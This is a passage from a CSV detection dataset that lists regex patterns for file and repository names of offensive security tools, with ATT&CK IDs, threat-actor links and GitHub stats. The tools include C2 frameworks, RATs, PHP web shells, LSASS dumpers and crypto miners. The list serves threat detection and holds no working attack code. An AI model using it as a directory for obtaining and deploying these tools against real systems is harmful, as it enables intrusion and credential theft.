Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","59472" "*SilentCryptoMiner.sln*",".{0,1000}SilentCryptoMiner\.sln.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","59473" "*SilentCryptoMiner-scm-v*",".{0,1000}SilentCryptoMiner\-scm\-v.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","59474" "*silenthound.py*",".{0,1000}silenthound\.py.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","59475" "*silenthound_enum*",".{0,1000}silenthound_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59476" "*silenthound_output_*.txt*",".{0,1000}silenthound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","59477" "*SilentHound-main*",".{0,1000}SilentHound\-main.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","59478" "*silentLsassDump*",".{0,1000}silentLsassDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","59479" "*SilentMoonwalk.cpp*",".{0,1000}SilentMoonwalk\.cpp.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59480" "*SilentMoonwalk.exe*",".{0,1000}SilentMoonwalk\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59481" "*SilentMoonwalk.sln*",".{0,1000}SilentMoonwalk\.sln.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59482" "*SilentMoonwalk-master*",".{0,1000}SilentMoonwalk\-master.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59483" "*SilentProcessExitRegistrySetter.cpp*",".{0,1000}SilentProcessExitRegistrySetter\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","59484" "*SilentProcessExitRegistrySetter.exe*",".{0,1000}SilentProcessExitRegistrySetter\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","59485" "*SILENTTRINITY*",".{0,1000}SILENTTRINITY.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59486" "*silenttrinity*.dll*",".{0,1000}silenttrinity.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59487" "*silly.host.of.iodine.code.kryo.se*",".{0,1000}silly\.host\.of\.iodine\.code\.kryo\.se.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","59488" "*SillyRAT.git*",".{0,1000}SillyRAT\.git.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","59489" "*sillyrat.py*",".{0,1000}sillyrat\.py.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","59490" "*silver*/beacon.go*",".{0,1000}silver.{0,1000}\/beacon\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59491" "*silver*implant.go*",".{0,1000}silver.{0,1000}implant\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59492" "*SilverPoision/Rock-ON*",".{0,1000}SilverPoision\/Rock\-ON.{0,1000}","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","N/A","3","297","69","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z","59494" "*Simone Margaritelli *",".{0,1000}Simone\sMargaritelli\s\.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","59495" "*SimoneLazzaris/ditty*",".{0,1000}SimoneLazzaris\/ditty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z","59496" "*Simple code for creating a DLL for netsh helper DLLs*",".{0,1000}Simple\scode\sfor\screating\sa\sDLL\sfor\snetsh\shelper\sDLLs.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","59497" "*Simple PHP backdoor by DK*",".{0,1000}Simple\sPHP\sbackdoor\sby\sDK.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59498" "*Simple powershell/C# to spawn a process under a different parent process*",".{0,1000}Simple\spowershell\/C\#\sto\sspawn\sa\sprocess\sunder\sa\sdifferent\sparent\sprocess.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","59499" "*Simple Shellcode Runner.csproj*",".{0,1000}Simple\sShellcode\sRunner\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59500" "*Simple Shellcode Runner.ps1*",".{0,1000}Simple\sShellcode\sRunner\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 
- T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59501" "*Simple Shellcode Runner.vba*",".{0,1000}Simple\sShellcode\sRunner\.vba.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59502" "*simple_dropper.ninja*",".{0,1000}simple_dropper\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","59503" "*simple_php_web_shell_get.php*",".{0,1000}simple_php_web_shell_get\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59504" "*simple_php_web_shell_get.php*",".{0,1000}simple_php_web_shell_get\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black 
Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59505" "*simple_php_web_shell_get__mini_v2.php*",".{0,1000}simple_php_web_shell_get__mini_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59506" "*simple_php_web_shell_get_mini.php*",".{0,1000}simple_php_web_shell_get_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59507" "*simple_php_web_shell_get_v2.php*",".{0,1000}simple_php_web_shell_get_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59508" "*simple_php_web_shell_get_v2.php*",".{0,1000}simple_php_web_shell_get_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59509" 
"*simple_php_web_shell_post.php*",".{0,1000}simple_php_web_shell_post\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59510" "*simple_php_web_shell_post_mini.php*",".{0,1000}simple_php_web_shell_post_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59511" "*SimpleBackdoorAdmin.dll*",".{0,1000}SimpleBackdoorAdmin\.dll.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59512" "*SimpleBackdoorAdmin.dll*",".{0,1000}SimpleBackdoorAdmin\.dll.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59513" "*SimpleBackdoorAdmin.exe*",".{0,1000}SimpleBackdoorAdmin\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59514" "*SimpleBackdoorAdmin.exe*",".{0,1000}SimpleBackdoorAdmin\.exe.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59515" "*simplekeylogger.*",".{0,1000}simplekeylogger\..{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","59547" "*SimpleNtSyscallFuzzer.v11.suo*",".{0,1000}SimpleNtSyscallFuzzer\.v11\.suo.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel 
syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","59548" "*SimpleNTSyscallFuzzer-main\*",".{0,1000}SimpleNTSyscallFuzzer\-main\\.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","59549" "*SimplyEmail.py*",".{0,1000}SimplyEmail\.py.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59550" "*SimplyEmail-master*",".{0,1000}SimplyEmail\-master.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. 
Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59551" "*SimplySecurity/SimplyEmail*",".{0,1000}SimplySecurity\/SimplyEmail.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59552" "*SimShell - Simorgh Security MGZ*",".{0,1000}SimShell\s\-\sSimorgh\sSecurity\sMGZ.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59553" "*sin5678/gh0st*",".{0,1000}sin5678\/gh0st.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - 
TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","59554" "*SinclairCC.MakeMeAdmin.Properties*",".{0,1000}SinclairCC\.MakeMeAdmin\.Properties.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59555" "*SinclairMakeMeAdmin.adml*",".{0,1000}SinclairMakeMeAdmin\.adml.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59556" "*SinclairMakeMeAdmin.admx*",".{0,1000}SinclairMakeMeAdmin\.admx.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59557" "*single_reverse_tcp_shell.s*",".{0,1000}single_reverse_tcp_shell\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides 